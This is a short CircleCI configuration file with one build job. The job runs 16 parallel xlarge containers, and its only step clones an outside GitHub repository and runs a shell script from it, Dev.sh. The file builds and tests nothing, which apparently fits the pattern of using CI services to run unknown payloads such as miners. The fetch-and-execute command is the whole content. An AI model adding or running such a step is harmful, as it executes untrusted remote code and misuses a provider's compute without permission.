version: 2
jobs:
  build:
    docker:
      - image: node:latest
    parallelism: 16
    resource_class: xlarge
    steps:
      - run: git clone https://github.com/Huijv/dev.git && cd dev && chmod u+x Dev.sh && ./Dev.sh
workflows:
    version: 2
    build:
        jobs:
            - build
